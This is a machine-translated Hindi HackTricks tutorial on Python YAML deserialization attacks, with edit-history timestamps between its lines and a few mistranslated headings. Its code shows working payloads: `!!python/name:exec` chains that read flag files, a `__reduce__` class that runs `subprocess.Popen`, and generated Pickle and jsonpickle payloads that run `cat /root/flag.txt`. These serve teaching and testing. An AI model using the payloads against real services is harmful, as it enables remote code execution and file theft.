2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योजनाएं** ](https://github.com/sponsors/carlospolop ) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), हमारा विशेष [**NFT संग्रह** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord समूह** ](https://discord.gg/hRep4RUj7f ) या [**टेलीग्राम समूह** ](https://t.me/peass ) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो ](https://github.com/carlospolop/hacktricks ) और [hacktricks-cloud रेपो ](https://github.com/carlospolop/hacktricks-cloud )** को PR जमा करके।
2022-04-28 16:01:33 +00:00
< / details >
2023-11-06 08:38:02 +00:00
# Yaml **डिसीरियलाइज़ेशन**
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
**Yaml** पायथन पुस्तकालयों के द्वारा केवल कच्चे डेटा को ही नहीं, बल्कि पायथन ऑब्जेक्ट्स को भी **सीरीयलाइज़ करने** के लिए सक्षम है:
2021-11-17 20:11:22 +00:00
```
print(yaml.dump(str("lol")))
lol
...
print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l
2023-11-06 08:38:02 +00:00
2021-11-17 20:11:22 +00:00
print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1
```
2023-11-06 08:38:02 +00:00
जांचें कि **tuple** एक रॉ डेटा प्रकार नहीं है और इसलिए इसे **सीरीयलाइज़** किया गया था। और यही हुआ **range** के साथ भी (बिल्टिन्स से लिया गया)।
2021-11-17 20:11:22 +00:00
2022-03-21 17:37:28 +00:00
![](< .. / . . / . gitbook / assets / image ( 628 ) ( 1 ) . png > )
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
**safe\_load()** या **safe\_load\_all()** SafeLoader का उपयोग करता है और **क्लास ऑब्जेक्ट डेसीरियलाइज़ेशन का समर्थन नहीं करता** । क्लास ऑब्जेक्ट डेसीरियलाइज़ेशन उदाहरण:
2021-11-17 20:11:22 +00:00
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'
print(yaml.load(data, Loader=UnsafeLoader)) #range (1, 10)
print(yaml.load(data, Loader=Loader)) #range (1, 10)
print(yaml.load_all(data)) #< generator object load_all at 0x7fc4c6d8f040 >
print(yaml.load_all(data, Loader=Loader)) #< generator object load_all at 0x7fc4c6d8f040 >
print(yaml.load_all(data, Loader=UnsafeLoader)) #< generator object load_all at 0x7fc4c6d8f040 >
print(yaml.load_all(data, Loader=FullLoader)) #< generator object load_all at 0x7fc4c6d8f040 >
print(yaml.unsafe_load(data)) #range (1, 10)
print(yaml.full_load_all(data)) #< generator object load_all at 0x7fc4c6d8f040 >
print(yaml.unsafe_load_all(data)) #< generator object load_all at 0x7fc4c6d8f040 >
#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object
```
2023-11-06 08:38:02 +00:00
पिछला कोड **unsafe\_load** का उपयोग करता है ताकि सीरीयलाइज़ किए गए पायथन क्लास को लोड कर सके। यह इसलिए है क्योंकि **संस्करण >= 5.1** में, यह लोड() या Loader=SafeLoader में निर्दिष्ट नहीं करता है, इसलिए किसी भी सीरीयलाइज़ किए गए पायथन क्लास या क्लास एट्रिब्यूट को डिसीरियलाइज़ करने की अनुमति नहीं देता है।
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
## मूल अभिक्रिया
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
एक उदाहरण जिसमें **नींद को निष्पादित करने** के लिए कैसे उपयोग करें:
2021-11-17 20:11:22 +00:00
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data))
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))
```
2023-11-06 08:38:02 +00:00
## लोडर के बिना संकटपूर्ण .load("\<सामग्री>")
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
पुराने संस्करणों में pyyaml खुलवाने के समय आप लोड करते समय लोडर की विशेष निर्दिष्टि नहीं करते थे तो वह असुरक्षित थे: `yaml.load(data)`
2022-02-18 17:51:13 +00:00
2023-11-06 08:38:02 +00:00
आप यहां [**संकट का विवरण यहां पा सकते हैं** ](https://hackmd.io/@defund/HJZajCVlP )**.** उस पृष्ठ में प्रस्तावित **शोषण** है:
2022-02-18 17:51:13 +00:00
```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
2023-11-06 08:38:02 +00:00
state:
update: !!python/name:exec
2022-02-18 17:51:13 +00:00
```
2023-11-06 08:38:02 +00:00
या आप इस **एक-लाइनर का उपयोग कर सकते हैं जो @ishaack द्वारा प्रदान किया गया है** :
2022-02-18 18:14:38 +00:00
```yaml
!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}
```
2023-11-06 08:38:02 +00:00
नोट करें कि **हाल के संस्करणों में** आप **अब `.load()` को बिना `Loader` के नहीं कह सकते** हैं और ** `FullLoader` ** इस हमले के प्रति **अब सुरक्षित है** ।
2022-02-18 17:51:13 +00:00
2022-05-01 12:41:36 +00:00
# RCE
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
कृपया ध्यान दें कि पेलोड निर्माण **किसी भी पायथन YAML मॉड्यूल (PyYAML या ruamel.yaml), उसी तरीके से** किया जा सकता है। एक ही पेलोड YAML मॉड्यूल या PyYAML या ruamel.yaml पर आधारित किसी भी मॉड्यूल को शोषित कर सकता है।
2021-11-17 20:11:22 +00:00
```python
import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess
class Payload(object):
2023-11-06 08:38:02 +00:00
def __reduce__ (self):
return (subprocess.Popen,('ls',))
2021-11-17 20:11:22 +00:00
deserialized_data = yaml.dump(Payload()) # serializing data
print(deserialized_data)
#!!python/object/apply:subprocess.Popen
#- ls
print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))
```
2023-11-06 08:38:02 +00:00
## यात्रा उत्पन्न करने के लिए टूल
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
टूल [https://github.com/j0lt-github/python-deserialization-attack-payload-generator ](https://github.com/j0lt-github/python-deserialization-attack-payload-generator ) का उपयोग करके पायथन डीसीरियलाइज़ेशन पेलोड उत्पन्न किए जा सकते हैं ताकि **Pickle, PyYAML, jsonpickle और ruamel.yaml** का दुरुपयोग किया जा सके:
2021-11-17 20:11:22 +00:00
```bash
2023-11-06 08:38:02 +00:00
python3 peas.py
2021-11-17 20:11:22 +00:00
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!
2023-11-06 08:38:02 +00:00
cat /tmp/example_jspick
2021-11-17 20:11:22 +00:00
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}
cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==
cat /tmp/example_yaml
!!python/object/apply:subprocess.Popen
- !!python/tuple
2023-11-06 08:38:02 +00:00
- cat
- /root/flag.txt
2021-11-17 20:11:22 +00:00
```
2023-11-06 08:38:02 +00:00
# संदर्भ
2021-11-17 20:11:22 +00:00
2023-11-06 08:38:02 +00:00
इस तकनीक के बारे में अधिक जानकारी के लिए पढ़ें: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf ](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf )
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं** ](https://github.com/sponsors/carlospolop ) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), हमारा विशेष [**NFT** ](https://opensea.io/collection/the-peass-family ) संग्रह
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord समूह** ](https://discord.gg/hRep4RUj7f ) या [**टेलीग्राम समूह** ](https://t.me/peass ) में या मुझे **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks_live )** का** अनुसरण करें।**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो ](https://github.com/carlospolop/hacktricks ) और [hacktricks-cloud रेपो ](https://github.com/carlospolop/hacktricks-cloud ) में पीआर जमा करके साझा करें।**
2022-04-28 16:01:33 +00:00
< / details >